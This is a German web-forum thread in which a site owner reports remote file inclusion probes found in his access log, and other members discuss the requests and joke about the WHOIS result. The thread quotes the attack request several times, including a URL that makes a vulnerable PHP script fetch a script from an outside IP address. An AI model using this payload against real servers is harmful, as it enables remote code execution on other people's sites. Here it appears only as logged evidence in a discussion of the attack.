Engin: Hacker auf meiner Seite zugange, auf frischer tat erwischt!

Hi,

hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.

Hab dutzende abfragen in Form von

/lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???

Die IPs sind

216.252.87.12 - libwww-perl/5.79
64.22.125.219 - libwww-perl/5.805
und einige mehr..

Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

Was sagt überhaupt diese Whois abfrage aus, ich versteh das nicht so ganz.
Ist die dort angegebene E-Mail adresse die des hackers?

Seine Seite ist auch über die IP abrufbar, http://64.22.125.219/, nur hat der Vogel kein Impressum,
den sollte man so einen Abmahn-wütigen Anwalt auf den Hals hetzen. *g

Warum finden diese idioten immer mich?

Grüße aus H im R,
Engin

  1. hallo Engin,

    /lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???

    Lies mal zum Vergleich den allerletzten noch im aktuellen Forum vorhandenen Thread nach.

    Grüße aus Berlin

    Christoph S.

    --
    Visitenkarte
    ss:| zu:) ls:& fo:) va:) sh:| rl:|
  2. Hi Engin,

    hab mal eine html Seite der access angefertigt, für die, die es interessiert, wie so ein angriff aussieht.

    http://nimmet.de/beispiele/hacker_access.html

    Grüße aus H im R,
    Engin

  3. Hallo,

    im Moment ist Dein Thread der neueste in der Forumshauptdatei.
    Zu Deiner Unterhaltung verlinke ich Dir den derzeit ältesten Thread "Was haben diese Zeilen zu bedeuten?".

    216.252.87.12 - libwww-perl/5.79
    64.22.125.219 - libwww-perl/5.805
    und einige mehr..

    Ich zitiere ein wenig aus Patricks Posting:

    <zitat>
       Aus meiner heutigen Logdatei:

    217.31.58.188 - libwww-perl/5.805
    </zitat>

    viel Spass beim Lesen :-)

    Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

    Engin

    Der nennt sich auch Engin, also wirklich - so eine Unverschämtheit aber auch. *g*

    Freundliche Grüße

    Vinzenz

    1. Hi Vinzenz,

      im Moment ist Dein Thread der neueste in der Forumshauptdatei.
      Zu Deiner Unterhaltung verlinke ich Dir den derzeit ältesten Thread "Was haben diese Zeilen zu bedeuten?".

      Stimmt ja, ich hatte bei den genannten Thread das Hauptthema ganz vergessen, mir fielen nur noch die
      lustigen Sinnsprüche 2.0 auf.  *g

      viel Spass beim Lesen :-)

      Ein wohl schon älteres Problem.

      Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

      Engin

      Der nennt sich auch Engin, also wirklich - so eine Unverschämtheit aber auch. *g*

      Nennt der sich wirklich ENGIN? Ich dachte eher, das hätte vielleicht irgendwas mit ENGINE zutun, nur ohne das letzte E.

      Vielleicht bin sogar ich das, merk es aber nicht. *g

      Grüße aus H im R,
      Engin

  4. Hellihello

    https://forum.selfhtml.org/?t=164874&m=1075038 in den u.g. Thread auch mein kleiner Beitrag nach einer Google-Suche.

    Dank und Gruß,

    frankx

    --
    tryin to multitain  - Globus = Planet != Welt
    1. Hi frankx,

      https://forum.selfhtml.org/?t=164874&m=1075038 in den u.g. Thread auch mein kleiner Beitrag nach einer Google-Suche.

      217.31.58.188 - libwww-perl/5.805

      Die Lib wird gerne von Script-Kiddies/Hackern/Adress-Sammlern/... verwendet, um Bots zu programmieren, die das Web durchforsten, ...

      War nicht deine Antwort, aber parallelen fallen auf, bei mir fand auf einer anderen Seite
      vor einiger Zeit ein erfolgreicher hacker angriff statt,

      Datei entdeckt, die da nicht hingehört, rOnin

      http://64.22.125.219/r0x/id.txt???

      Die scheinen alle die gleiche ausbildung zu geniessen.

      Grüße aus H im R,
      Engin

  5. Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

    *singt* Engin hackt sich selber Engin hackt sich selber!

    Leidest Du unter multiplen Persoenlichkeiten? :)

    1. Hi Steel,

      Eine Who is abfrage erzählt mir was von einem "ENGIN7-ARIN"... :-)

      *singt* Engin hackt sich selber Engin hackt sich selber!

      Leidest Du unter multiplen Persoenlichkeiten? :)

      Diese vermutung habe ich auch gerade in erwägung gezogen.

      Das wird langsam mysthisch hier. *g

      Grüße aus H im R,
      Engin

      1. Hi Engin!

        Leidest Du unter multiplen Persoenlichkeiten? :)

        Diese vermutung habe ich auch gerade in erwägung gezogen.

        Dort vermutetest du komischerweise aber keine multiple Persönlichkeitsstörung sondern Schizophrenie. ;-)

        mfG
        Benjamin

        --
        Selfcode: ie:} fl:{ br:> va:) ls:< fo:( rl:? n4:# ss:| de:] js:| ch:? sh:( mo:? zu:)
        "Das Problem kennen ist wichtiger, als die Lösung zu finden, denn die genaue Darstellung des Problems führt automatisch zur richtigen Lösung."
        (Albert Einstein)
        1. Hi Benjamin,

          Leidest Du unter multiplen Persoenlichkeiten? :)

          Diese vermutung habe ich auch gerade in erwägung gezogen.

          Dort vermutetest du komischerweise aber keine multiple Persönlichkeitsstörung sondern Schizophrenie. ;-)

          Das war ich nicht.                            ;-)

          Grüße aus H im R,
          Engin

  6. Gutem Morgen,

    hab grade in meinen access.log einen Hacker ausfindig gemacht, dieses mal auf meiner geliebten nimmet Domain.

    Hab dutzende abfragen in Form von

    /lokal//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt???

    Die IPs sind

    216.252.87.12 - libwww-perl/5.79
    64.22.125.219 - libwww-perl/5.805

    Du hast in der Log-Datei die IP-Adressen und die User-Agenten stehen, die HTTP-Requests machen. Das hat mit "Hacken" grundsätzlich gar nichts zu tun.

    IP-Adresse: muss nicht vom Zugangsprovider sein, kann auch von einem Proxy-Server stammen.
    User-Agent: Blahh. Da kann auch "Zitrone" stehen.

    Ein richtiger Hacker dringt in ein System ein, ohne seine Visitenkarte zu hinterlassen.

    Schönen Tag noch,
    Hotte